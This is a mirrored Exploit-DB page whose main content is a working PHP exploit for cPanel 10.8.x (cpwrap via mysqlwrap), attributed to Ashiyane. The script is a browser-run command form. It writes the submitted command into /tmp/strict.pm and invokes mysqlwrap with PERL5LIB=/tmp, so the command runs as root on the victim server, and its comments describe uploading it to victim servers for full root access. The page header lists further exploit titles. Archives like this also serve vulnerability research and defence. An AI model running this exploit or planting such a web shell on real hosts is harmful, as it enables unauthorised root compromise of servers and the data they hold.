bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/2554.php
Offensive Security 51c5257c7f DB: 2017-10-14 
11 new exploits

FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service
FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service
FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service
FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service

Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups
Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups
mIRC 6.1 - DCC SEND Buffer Overflow (1)
mIRC 6.1 - DCC SEND Buffer Overflow (2)
mIRC 6.1 - 'DCC SEND' Buffer Overflow (1)
mIRC 6.1 - 'DCC SEND' Buffer Overflow (2)

Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution
Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution

Oracle Solaris - 'su' Local Solaris
Oracle Solaris - 'su' Local Exploit

Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)

Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)

phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion
phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion

cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)
cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)

WWWISIS 7.1 - (IsisScript) Local File Disclosure / Cross-Site Scripting
WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting

SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting
SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting
YaPiG 0.95b - view.php img_size Parameter Cross-Site Scripting
Accelerated Mortgage Manager - Password Field SQL Injection
YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting
Accelerated Mortgage Manager - 'Password' SQL Injection

YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting
YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting
Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion
Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion
Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion
Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion
Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion
Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion
Xoops 2.2.3 - search.php Cross-Site Scripting
Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'files/mainfile.php?page[path]' Remote File Inclusion
Xoops 2.2.3 - 'search.php' Cross-Site Scripting

Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection
Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection

TYPO3 ke DomPDF Extension - Remote Code Execution
TYPO3 Extension ke DomPDF - Remote Code Execution

TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection
TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection

TYPO3 News Module - SQL Injection
TYPO3 Extension News - SQL Injection
OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting
E-Sic Software livre CMS - 'q' Parameter SQL Injection
E-Sic Software livre CMS - Autentication Bypass
E-Sic Software livre CMS - 'cpfcnpj' Parameter SQL Injection
E-Sic Software livre CMS - 'f' Parameter SQL Injection
E-Sic Software livre CMS - Cross Site Scripting
TYPO3 Extension Restler 1.7.0 - Local File Disclosure
Dreambox Plugin BouquetEditor - Cross-Site Scripting
phpMyFAQ 2.9.8 - Cross-Site Scripting
2017-10-14 05:01:31 +00:00

52 lines
No EOL
1.8 KiB
PHP
Executable file
Raw Blame History

<!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
<!- bash shell access on victim server but with this new exploit you only need
<!- to upload php file and run this into browser on victim servers.
<!- then you have root Access and you can do anything ....
<!- Coded by nima salehi ( nima@ashiyane.ir )
<!- Ashiyane Security Corporation www.Ashiyane.ir >
<title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
<center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
<?
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "<br><br><br><br><br><b>Sorry Safe-mode Is On ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "<br><br><br><br><br><b>Sorry Passthru Is Disable ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
}
?>
<form method="POST" action="<?php echo $surl; ?>">
Command : <input type="text" name="c" size="40">
<input type="submit" value=" Run " name="B1"></form>
<textarea cols="60" rows="20" readonly>
<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>
</textarea>
<br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center>
# milw0rm.com [2006-10-13]
Reference in a new issue View git blame Copy permalink